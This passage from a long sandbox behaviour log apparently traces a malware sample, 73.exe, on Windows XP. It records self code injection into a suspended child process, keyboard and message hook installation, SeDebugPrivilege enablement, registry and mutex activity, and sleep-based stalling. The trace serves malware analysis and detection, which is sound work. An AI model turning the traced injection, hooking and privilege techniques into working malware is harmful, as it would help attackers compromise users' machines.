39286.            ads:
39287.          fid (ads:): 0
39288.          failure: open
39289.          ntstatus: 0xc000003a
39290.          CreateOptions: 0x200000
39291.        file:
39292.          timestamp: 45438
39293.          mode: failed
39294.          sequenceNumber: 38
39295.          value: C:\WINDOWS\system32\wbem\R38QI00A0M0\D77273J5H4B
39296.          processinfo:
39297.            pid: 1824
39298.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39299.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39300.            ads:
39301.          fid (ads:): 0
39302.          failure: open
39303.          ntstatus: 0xc000003a
39304.          CreateOptions: 0x200000
39305.        file:
39306.          timestamp: 45442
39307.          mode: failed
39308.          sequenceNumber: 39
39309.          value: C:\Program Files\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
39310.          processinfo:
39311.            pid: 1824
39312.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39313.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39314.            ads:
39315.          fid (ads:): 0
39316.          failure: open
39317.          ntstatus: 0xc000003a
39318.          CreateOptions: 0x200000
39319.        file:
39320.          timestamp: 45446
39321.          mode: failed
39322.          sequenceNumber: 40
39323.          value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
39324.          processinfo:
39325.            pid: 1824
39326.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39327.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39328.            ads:
39329.          fid (ads:): 0
39330.          failure: open
39331.          ntstatus: 0xc000003a
39332.          CreateOptions: 0x200000
39333.        file:
39334.          timestamp: 45450
39335.          mode: failed
39336.          sequenceNumber: 41
39337.          value: C:\Program Files\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
39338.          processinfo:
39339.            pid: 1824
39340.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39341.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39342.            ads:
39343.          fid (ads:): 0
39344.          failure: open
39345.          ntstatus: 0xc000003a
39346.          CreateOptions: 0x200000
39347.        apicall:
39348.          timestamp: 45392
39349.          sequenceNumber: 42
39350.          processinfo:
39351.            pid: 1824
39352.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39353.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39354.          dllname: user32.dll
39355.          apiname: EnumWindows
39356.          address: 0x003d0eba
39357.          params:
39358.            param (id:1): 0x3d0e20
39359.            param (id:2): 0x12f5f0
39360.        apicall:
39361.          timestamp: 45457
39362.          sequenceNumber: 43
39363.          processinfo:
39364.            pid: 1824
39365.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39366.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39367.          dllname: kernel32.dll
39368.          apiname: Sleep
39369.          address: 0x003d11cc
39370.          params:
39371.            param (id:1): 1100
39372.        process:
39373.          timestamp: 46614
39374.          mode: started
39375.          sequenceNumber: 44
39376.          value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39377.          pid: 364
39378.          ppid: 1824
39379.          parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39380.          cmdline: "C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe"
39381.          filesize: 364544
39382.          md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39383.          sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
39384.            ads:
39385.          fid (ads:): 3096224743826754
39386.        codeinjection:
39387.          timestamp: 46621
39388.          suppressed: false
39389.          mode: create process suspended memory write code injection
39390.          sequenceNumber: 45
39391.          source:
39392.            tainted: true
39393.            processinfo:
39394.              pid: 1824
39395.              imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39396.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39397.          target:
39398.            tainted: true
39399.            processinfo:
39400.              pid: 364
39401.              imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39402.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39403.        malicious-alert:
39404.          classtype: Code-Injection-Tracking
39405.          weight: 0
39406.          ruleid: 4610 : Code Injection Obsevered ; Self Code Injection Tracking
39407.          msg: Self Code Injection Tracking
39408.          display-msg: Code Injection Obsevered
39409.        process:
39410.          timestamp: 46632
39411.          mode: terminated
39412.          sequenceNumber: 46
39413.          value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39414.          pid: 1824
39415.          ppid: 2684
39416.          parentname: C:\WINDOWS\explorer.exe
39417.          cmdline: N/A
39418.            ads:
39419.          fid (ads:): 3096224743826754
39420.        file:
39421.          timestamp: 46641
39422.          mode: failed
39423.          sequenceNumber: 47
39424.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\LPK.DLL
39425.          processinfo:
39426.            tainted: true
39427.            pid: 364
39428.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39429.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39430.            ads:
39431.          fid (ads:): 0
39432.          failure: open
39433.          ntstatus: 0xc0000034
39434.          CreateOptions: 0x200000
39435.          PE:
39436.            InspectionType: Ext
39437.        file:
39438.          timestamp: 46648
39439.          mode: failed
39440.          sequenceNumber: 48
39441.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\USP10.dll
39442.          processinfo:
39443.            tainted: true
39444.            pid: 364
39445.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39446.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39447.            ads:
39448.          fid (ads:): 0
39449.          failure: open
39450.          ntstatus: 0xc0000034
39451.          CreateOptions: 0x200000
39452.          PE:
39453.            InspectionType: Ext
39454.        process:
39455.          timestamp: 46692
39456.          mode: duplicate_opened
39457.          sequenceNumber: 49
39458.          desiredaccess: 0x00000000
39459.          ntstatus: 0x00000000
39460.          target:
39461.            processinfo:
39462.              pid: 364
39463.              imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39464.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39465.          duplicate_source:
39466.            processinfo:
39467.              pid: 364
39468.              tid: 0
39469.              imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39470.          duplicate_target:
39471.            processinfo:
39472.              pid: 364
39473.              tid: 0
39474.              imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39475.          InheritHandle: 0x00000000
39476.          Options: 0x00000002
39477.          source:
39478.            processinfo:
39479.              pid: 364
39480.              imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39481.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39482.        regkey:
39483.          timestamp: 46703
39484.          mode: added
39485.          sequenceNumber: 50
39486.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
39487.          processinfo:
39488.            pid: 364
39489.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39490.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39491.        regkey:
39492.          randomized: true
39493.          mode: queryvalue
39494.          sequenceNumber: 51
39495.          timestamp: 46710
39496.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
39497.           processinfo:
39498.             pid: 364
39499.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39500.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39501.         regkey:
39502.           timestamp: 46799
39503.           mode: added
39504.           sequenceNumber: 52
39505.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
39506.           processinfo:
39507.             pid: 364
39508.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39509.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39510.         regkey:
39511.           timestamp: 46804
39512.           mode: added
39513.           sequenceNumber: 53
39514.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
39515.           processinfo:
39516.             pid: 364
39517.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39518.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39519.         regkey:
39520.           timestamp: 46808
39521.           mode: setval
39522.           sequenceNumber: 54
39523.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
39524.          processinfo:
39525.            pid: 364
39526.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39527.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39528.        apicall:
39529.          timestamp: 46814
39530.          sequenceNumber: 55
39531.          processinfo:
39532.            pid: 364
39533.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39534.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39535.          dllname: kernel32.dll
39536.          apiname: Sleep
39537.          address: 0x0042207d
39538.          params:
39539.            param (id:1): 15
39540.        apicall:
39541.          timestamp: 46824
39542.          sequenceNumber: 56
39543.          processinfo:
39544.            pid: 364
39545.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39546.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39547.          dllname: kernel32.dll
39548.          apiname: Sleep
39549.          address: 0x0042207d
39550.          params:
39551.            param (id:1): 15
39552.        apicall:
39553.          timestamp: 46840
39554.          sequenceNumber: 57
39555.          processinfo:
39556.            pid: 364
39557.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39558.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39559.          dllname: kernel32.dll
39560.          apiname: Sleep
39561.          address: 0x0042207d
39562.          params:
39563.            param (id:1): 15
39564.        apicall:
39565.          timestamp: 46855
39566.          sequenceNumber: 58
39567.          processinfo:
39568.            pid: 364
39569.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39570.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39571.          dllname: kernel32.dll
39572.          apiname: Sleep
39573.          address: 0x0042207d
39574.          params:
39575.            param (id:1): 15
39576.        apicall:
39577.          timestamp: 46871
39578.          sequenceNumber: 59
39579.          processinfo:
39580.            pid: 364
39581.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39582.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39583.          dllname: kernel32.dll
39584.          apiname: Sleep
39585.          address: 0x0042207d
39586.          params:
39587.            param (id:1): 15
39588.        apicall:
39589.          timestamp: 46888
39590.          sequenceNumber: 60
39591.          processinfo:
39592.            pid: 364
39593.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39595.          dllname: kernel32.dll
39596.          apiname: Sleep
39597.          address: 0x0042207d
39598.          params:
39599.            param (id:1): 15
39600.        apicall:
39601.          timestamp: 46902
39602.          sequenceNumber: 61
39603.          processinfo:
39604.            pid: 364
39605.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39606.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39607.          dllname: kernel32.dll
39608.          apiname: Sleep
39609.          address: 0x0042207d
39610.          params:
39611.            param (id:1): 15
39612.        apicall:
39613.          timestamp: 46918
39614.          sequenceNumber: 62
39615.          processinfo:
39616.            pid: 364
39617.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39618.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39619.          dllname: kernel32.dll
39620.          apiname: Sleep
39621.          address: 0x0042207d
39622.          params:
39623.            param (id:1): 15
39624.        apicall:
39625.          timestamp: 46933
39626.          sequenceNumber: 63
39627.          processinfo:
39628.            pid: 364
39629.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39630.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39631.          dllname: kernel32.dll
39632.          apiname: Sleep
39633.          address: 0x0042207d
39634.          params:
39635.            param (id:1): 15
39636.        file:
39637.          timestamp: 46951
39638.          mode: failed
39639.          sequenceNumber: 64
39640.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\CLBCATQ.DLL
39641.          processinfo:
39642.            tainted: true
39643.            pid: 364
39644.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39646.            ads:
39647.          fid (ads:): 0
39648.          failure: open
39649.          ntstatus: 0xc0000034
39650.          CreateOptions: 0x200000
39651.          PE:
39652.            InspectionType: Ext
39653.        file:
39654.          timestamp: 46957
39655.          mode: failed
39656.          sequenceNumber: 65
39657.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\COMRes.dll
39658.          processinfo:
39659.            tainted: true
39660.            pid: 364
39661.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39662.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39663.            ads:
39664.          fid (ads:): 0
39665.          failure: open
39666.          ntstatus: 0xc0000034
39667.          CreateOptions: 0x200000
39668.          PE:
39669.            InspectionType: Ext
39670.        apicall:
39671.          timestamp: 46962
39672.          sequenceNumber: 66
39673.          processinfo:
39674.            pid: 364
39675.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39676.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39677.          dllname: kernel32.dll
39678.          apiname: GetSystemDirectoryW
39679.          address: 0x76fd7ee4
39680.          params:
39681.            param (id:1): 0x77043650
39682.            param (id:2): 261
39683.        mutex:
39684.          timestamp: 47280
39685.          sequenceNumber: 67
39686.          value: \BaseNamedObjects\AMResourceMutex2
39687.          processinfo:
39688.            pid: 364
39689.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39690.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39691.        mutex:
39692.          timestamp: 47321
39693.          sequenceNumber: 68
39694.          value: \BaseNamedObjects\VideoRenderer
39695.          processinfo:
39696.            pid: 364
39697.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39698.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39699.        apicall:
39700.          timestamp: 47326
39701.          sequenceNumber: 69
39702.          processinfo:
39703.            pid: 364
39704.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39705.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39706.          dllname: kernel32.dll
39707.          apiname: GetSystemDirectoryA
39708.          address: 0x74723c7f
39709.          params:
39710.            param (id:1): 0xd3f568
39711.            param (id:2): 261
39712.        apicall:
39713.          timestamp: 47330
39714.          sequenceNumber: 70
39715.          processinfo:
39716.            pid: 364
39717.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39718.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39719.          dllname: kernel32.dll
39720.          apiname: GetSystemDirectoryA
39721.          address: 0x74723c7f
39722.          params:
39723.            param (id:1): 0xd3f570
39724.            param (id:2): 261
39725.        mutex:
39726.          timestamp: 47331
39727.          sequenceNumber: 71
39728.          value: \BaseNamedObjects\CTF.LBES.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
39729.          processinfo:
39730.            pid: 364
39731.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39732.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39733.        mutex:
39734.          timestamp: 47331
39735.          sequenceNumber: 72
39736.          value: \BaseNamedObjects\CTF.Compart.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
39737.          processinfo:
39738.            pid: 364
39739.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39740.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39741.        mutex:
39742.          timestamp: 47331
39743.          sequenceNumber: 73
39744.          value: \BaseNamedObjects\CTF.Asm.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
39745.          processinfo:
39746.            pid: 364
39747.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39748.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39749.        mutex:
39750.          timestamp: 47331
39751.          sequenceNumber: 74
39752.          value: \BaseNamedObjects\CTF.Layouts.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
39753.          processinfo:
39754.            pid: 364
39755.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39756.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39757.        mutex:
39758.          timestamp: 47331
39759.          sequenceNumber: 75
39760.          value: \BaseNamedObjects\CTF.TMD.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
39761.          processinfo:
39762.            pid: 364
39763.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39764.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39765.        apicall:
39766.          timestamp: 47331
39767.          sequenceNumber: 76
39768.          processinfo:
39769.            pid: 364
39770.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39771.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39772.          dllname: kernel32.dll
39773.          apiname: GetSystemDirectoryA
39774.          address: 0x74723c7f
39775.          params:
39776.            param (id:1): 0xd3f4bc
39777.            param (id:2): 261
39778.        mutex:
39779.          timestamp: 47368
39780.          sequenceNumber: 77
39781.          value: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-1409082233-688789844-725345543-1003MUTEX.DefaultS-1-5-21-1409082233-688789844-725345543-1003
39782.          processinfo:
39783.            pid: 364
39784.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39786.        apicall:
39787.          timestamp: 47373
39788.          sequenceNumber: 78
39789.          processinfo:
39790.            pid: 364
39791.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39792.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39793.          dllname: user32.dll
39794.          apiname: SetWindowsHookExA
39795.          address: 0x7473097c
39796.          params:
39797.            param (id:1): 2
39798.            param (id:2): 0x747307c3
39799.            param (id:3): 0x74720000
39800.            param (id:4): 856
39801.        apicall:
39802.          timestamp: 47378
39803.          sequenceNumber: 79
39804.          processinfo:
39805.            pid: 364
39806.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39807.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39808.          dllname: user32.dll
39809.          apiname: SetWindowsHookExA
39810.          address: 0x7473099a
39811.          params:
39812.            param (id:1): 7
39813.            param (id:2): 0x747304cd
39814.            param (id:3): 0x74720000
39815.            param (id:4): 856
39816.        apicall:
39817.          timestamp: 47383
39818.          sequenceNumber: 80
39819.          processinfo:
39820.            pid: 364
39821.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39822.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39823.          dllname: kernel32.dll
39824.          apiname: GetSystemDirectoryW
39825.          address: 0x763982be
39826.          params:
39827.            param (id:1): 0xd3ef98
39828.            param (id:2): 260
39829.        apicall:
39830.          timestamp: 47391
39831.          sequenceNumber: 81
39832.          processinfo:
39833.            pid: 364
39834.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39836.          dllname: kernel32.dll
39837.          apiname: GetSystemDirectoryW
39838.          address: 0x763982be
39839.          params:
39840.            param (id:1): 0xd3f548
39841.            param (id:2): 260
39842.        apicall:
39843.          timestamp: 47396
39844.          sequenceNumber: 82
39845.          processinfo:
39846.            pid: 364
39847.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39848.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39849.          dllname: kernel32.dll
39850.          apiname: GetSystemDirectoryA
39851.          address: 0x755dd289
39852.          params:
39853.            param (id:1): 0xd3eb8c
39854.            param (id:2): 261
39855.        apicall:
39856.          timestamp: 47400
39857.          sequenceNumber: 83
39858.          processinfo:
39859.            pid: 364
39860.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39861.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39862.          dllname: kernel32.dll
39863.          apiname: GetSystemDirectoryA
39864.          address: 0x755dd289
39865.          params:
39866.            param (id:1): 0xd3f630
39867.            param (id:2): 261
39868.        apicall:
39869.          timestamp: 47405
39870.          sequenceNumber: 84
39871.          processinfo:
39872.            pid: 364
39873.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39874.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39875.          dllname: kernel32.dll
39876.          apiname: GetSystemDirectoryW
39877.          address: 0x763982be
39878.          params:
39879.            param (id:1): 0xd3f1b8
39880.            param (id:2): 260
39881.        file:
39882.          timestamp: 47412
39883.          mode: failed
39884.          sequenceNumber: 85
39885.          value: C:\DOCUME~1\admin\LOCALS~1\Temp\MSVFW32.dll
39886.          processinfo:
39887.            tainted: true
39888.            pid: 364
39889.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39891.            ads:
39892.          fid (ads:): 0
39893.          failure: open
39894.          ntstatus: 0xc0000034
39895.          CreateOptions: 0x200000
39896.          PE:
39897.            InspectionType: Ext
39898.        regkey:
39899.          timestamp: 47620
39900.          mode: added
39901.          sequenceNumber: 86
39902.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
39903.          processinfo:
39904.            pid: 364
39905.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39906.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39907.        regkey:
39908.          timestamp: 47624
39909.          mode: setval
39910.          sequenceNumber: 87
39911.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"CD Burning" = C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\CD Burning
39912.           processinfo:
39913.             pid: 364
39914.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39915.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39916.         regkey:
39917.           timestamp: 47629
39918.           mode: added
39919.           sequenceNumber: 88
39920.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
39921.           processinfo:
39922.             pid: 364
39923.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39924.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39925.         folder:
39926.           timestamp: 47634
39927.           mode: open
39928.           sequenceNumber: 89
39929.           value: C:\Documents and Settings\admin\My Documents
39930.           processinfo:
39931.             pid: 364
39932.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39933.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39934.           ntstatus: 0x0
39935.           CreateOptions: 0x200000
39936.         regkey:
39937.           timestamp: 47637
39938.           mode: added
39939.           sequenceNumber: 90
39940.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
39941.           processinfo:
39942.             pid: 364
39943.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39944.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39945.         regkey:
39946.           timestamp: 47641
39947.           mode: setval
39948.           sequenceNumber: 91
39949.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Personal" = C:\Documents and Settings\admin\My Documents
39950.          processinfo:
39951.            pid: 364
39952.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39953.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39954.        regkey:
39955.          timestamp: 47645
39956.          mode: added
39957.          sequenceNumber: 92
39958.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
39959.          processinfo:
39960.            pid: 364
39961.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39962.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39963.        regkey:
39964.          timestamp: 47649
39965.          mode: added
39966.          sequenceNumber: 93
39967.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
39968.          processinfo:
39969.            pid: 364
39970.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39971.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39972.        regkey:
39973.          timestamp: 47653
39974.          mode: setval
39975.          sequenceNumber: 94
39976.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
39977.           processinfo:
39978.             pid: 364
39979.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39980.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39981.         regkey:
39982.           timestamp: 47653
39983.           mode: added
39984.           sequenceNumber: 95
39985.           value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
39986.           processinfo:
39987.             pid: 364
39988.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39989.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39990.         regkey:
39991.           timestamp: 47662
39992.           mode: added
39993.           sequenceNumber: 96
39994.           value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
39995.           processinfo:
39996.             pid: 364
39997.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
39998.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
39999.         regkey:
40000.           timestamp: 47666
40001.           mode: setval
40002.           sequenceNumber: 97
40003.           value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Desktop" = C:\Documents and Settings\All Users\Desktop
40004.          processinfo:
40005.            pid: 364
40006.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40007.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40008.        regkey:
40009.          timestamp: 47672
40010.          mode: added
40011.          sequenceNumber: 98
40012.          value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
40013.          processinfo:
40014.            pid: 364
40015.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40016.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40017.        regkey:
40018.          timestamp: 47677
40019.          mode: setval
40020.          sequenceNumber: 99
40021.          value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData" = C:\Documents and Settings\All Users\Application Data
40022.           processinfo:
40023.             pid: 364
40024.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40025.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40026.         apicall:
40027.           timestamp: 47684
40028.           sequenceNumber: 100
40029.           processinfo:
40030.             pid: 364
40031.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40032.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40033.           dllname: ntdll.dll
40034.           apiname: NtAdjustPrivilegesToken
40035.           address: 0x77ddf01a
40036.           params:
40037.             param (id:1): SeDebugPrivilege
40038.             param (id:2): Enabled
40039.         apicall:
40040.           timestamp: 47689
40041.           sequenceNumber: 101
40042.           processinfo:
40043.             pid: 364
40044.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40045.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40046.           dllname: advapi32.dll
40047.           apiname: GetTokenInformation
40048.           address: 0x0041e684
40049.           params:
40050.             param (id:1): 0x1b4
40051.             param (id:2): 0x19
40052.         apicall:
40053.           timestamp: 47689
40054.           sequenceNumber: 102
40055.           processinfo:
40056.             pid: 364
40057.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40058.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40059.           dllname: kernel32.dll
40060.           apiname: Sleep
40061.           address: 0x0042207d
40062.           params:
40063.             param (id:1): 15
40064.         apicall:
40065.           timestamp: 47699
40066.           sequenceNumber: 103
40067.           processinfo:
40068.             pid: 364
40069.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40070.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40071.           dllname: kernel32.dll
40072.           apiname: Sleep
40073.           address: 0x0042207d
40074.           params:
40075.             param (id:1): 15
40076.         apicall:
40077.           timestamp: 47715
40078.           sequenceNumber: 104
40079.           processinfo:
40080.             pid: 364
40081.             imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
40082.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
40083.           dllname: kernel32.dll
40084.           apiname: Sleep
